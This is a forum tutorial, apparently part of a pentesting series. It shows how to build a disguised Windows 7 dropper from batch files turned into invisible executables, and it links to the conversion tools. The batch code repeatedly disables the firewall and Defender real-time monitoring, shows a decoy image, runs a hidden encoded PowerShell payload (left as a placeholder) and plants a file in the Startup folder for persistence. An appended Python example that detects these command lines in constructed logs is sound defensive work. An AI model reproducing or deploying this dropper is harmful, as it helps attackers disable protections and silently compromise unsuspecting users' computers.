Learn About Computers

Teaching about Computers


    28. Wlan Pentest Create Icon Preparing Payload Windows 7


    Post by Aof on Wed May 30, 2018 2:59 am


    Payload Concealment
    1. Create an icon with Big J's Icon Maker; you could use any icon maker for this.
    2. Edit the F1 file first, putting the payload in the "INSERT-HERE" from the original payload file or the fi file we edited earlier, inside of the ('INSERT-HERE') enclosed punctuation, under the A: block of text.
    3. Create a new folder around the bat files named "e" to put our exe files that we create using the BattoExe program that we learned about in our previous LAN pentesting videos.
    4. Choose f.bat to convert into an invisible 64-bit exe; first make sure %appdata% is set as the working directory.
    5. Then choose f1.bat to convert to an invisible 64-bit exe; make sure %appdata% is set for the working directory, and overwrite is set, and extract embedded items to %appdata% as well; include the f.exe file that we just created.
    6. Then choose af.bat to convert to an invisible 64-bit exe; make sure %appdata% is set for the working directory, choose an icon for the file, choose %appdata% for embedded items, and make sure overwrite is set to yes. We will choose to embed "zombie.PNG" and "f1.exe" (f1.exe also has f.exe embedded within it, which we did previously), so there is no need to include the f.exe.
    7. The payload here is created for a Windows 7 PC; if it were to be created for a Windows 10 PC, we would require administrative privileges, as we did with the LAN pentesting video earlier, so that it could disable W10 protection.
    8. The "File.exe" is what the target PC will click to initiate the connection between the user and the Linux user.
    9. Once it's double-clicked, it will open the zombie.PNG image for the user, and run the f1.exe file in the background.
    10. The f.exe file will remain silent until the user restarts their PC, then it will remove f1.exe from the target's %appdata% folder.
    The video has been sped up at this point; it then navigates to the folder where the files were extracted to show you how everything works.

    Contents of fi.bat file
    =*=
    Code:
    @echo off & powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul
    exit

    af.bat file contents
    This file will be the first and main file, which will eventually contain all of the other exe files that we create using Bat to Exe. It will also be in charge of disabling protection, or bypassing it, on Windows 7 64-bit systems; this will not work for 32-bit Windows 7 systems.
    =*=
    Code:
    @echo off
    if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
    taskkill /im f1.exe /f
    timeout /t 01 > nul
    start "" "%appdata%\zombie.png"
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    "%appdata%\f1.exe" 2> nul
    exit

    f1.bat file contents
    This bat file is the one that should actually contain your payload, in the 'INSERT-HERE' section under the A: block of text.
    =*=
    Code:
    @echo off
    taskkill /im powershell.exe /f 2> nul
    timeout /t 02
    move "%appdata%\f.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe"
    :Begin
    set t=%date:~4,5%
    if "%t%"=="03/02" goto :A
    if not "%t%"=="03/02" goto :B
    timeout /t 02 > nul
    :A
    powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul
    exit
    :B
    timeout /t 05
    start "" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe" 2> nul
    timeout /t 05

    f.bat file contents
    This bat file tells Windows to remove the f1.exe file whenever the user restarts the computer.
    =*=
    Code:
    @echo off
    taskkill /im f1.exe /f 2> nul
    taskkill /im powershell.exe /f
    timeout /t 04 > nul
    del "%appdata%\f1.exe" /q /s /f 2> nul
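
The command lines in the batch files above stand out in process-creation telemetry (for example Sysmon Event ID 1, or Security event 4688 with command-line auditing). The following is an added detection example, not part of the original post: it matches those command lines in constructed log records and flags hosts where the firewall and Defender changes repeat together, as the af.bat loop would produce. The rule names, host names, record layout and thresholds are assumptions.

```python
import re
from collections import defaultdict

# Rules written from the command lines in the batch files above.
RULES = {
    "firewall_all_profiles_off": re.compile(
        r"netsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off", re.I),
    "defender_realtime_disabled": re.compile(
        r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$?(true|1)\b", re.I),
    "hidden_powershell_window": re.compile(   # -w 1 is WindowStyle Hidden
        r"powershell(\.exe)?\b.*\s-w\w*\s+(1|hidden)\b", re.I),
    "flag_built_from_variables": re.compile(  # "-" + "ec" joined at run time
        r"\b(sv|set-variable)\b.*\b(gv|get-variable)\b.*\.value", re.I),
    "exe_run_from_startup_folder": re.compile(
        r"\\Start Menu\\Programs\\Startup\\[^\"\\]+\.exe", re.I),
}

# Constructed process-creation records: (seconds, host, command line).
SAMPLE_EVENTS = [
    (0, "WS-01", r'netsh advfirewall set allprofiles state off'),
    (1, "WS-01", r'powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true"'),
    (11, "WS-01", r'netsh advfirewall set allprofiles state off'),
    (12, "WS-01", r'powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true"'),
    (95, "WS-01", r'''powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()'''
                  r'''+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'"'''),
    (130, "WS-01", r'"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu'
                   r'\Programs\Startup\f.exe"'),
    (5, "WS-02", r'netsh advfirewall show allprofiles'),        # benign query
    (9, "WS-02", r'powershell.exe -NoProfile -Command "Get-MpPreference"'),
]

def match_rules(cmdline):
    """Return the sorted names of every rule the command line triggers."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def tamper_hosts(events, window=120, min_pairs=2):
    """Hosts where firewall-off and Defender-off occur together at least min_pairs times."""
    seen = defaultdict(lambda: defaultdict(list))
    for ts, host, cmdline in events:
        for name in match_rules(cmdline):
            seen[host][name].append(ts)
    flagged = []
    for host, hits in seen.items():
        fw, av = hits["firewall_all_profiles_off"], hits["defender_realtime_disabled"]
        pairs = sum(1 for t in fw if any(abs(t - a) <= window for a in av))
        if pairs >= min_pairs:
            flagged.append(host)
    return sorted(flagged)
```
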





    Re: 28. Wlan Pentest Create Icon Preparing Payload Windows 7

    Post by Aof on Wed May 30, 2018 3:31 am

    http://www.majorgeeks.com/files/details/bat_to_exe_converter.html
    Bat to Exe Converter Download Link

    mediafire.com/file/lljfw7si9crtwrb/bjim.zip
    Note: Any Icon Maker can be used, you don't have to use a specific one.
    Big J Icon Maker Download Link: copy and paste the address above into your browser. Also, it should be noted that any icon maker should work; you don't have to use this one.
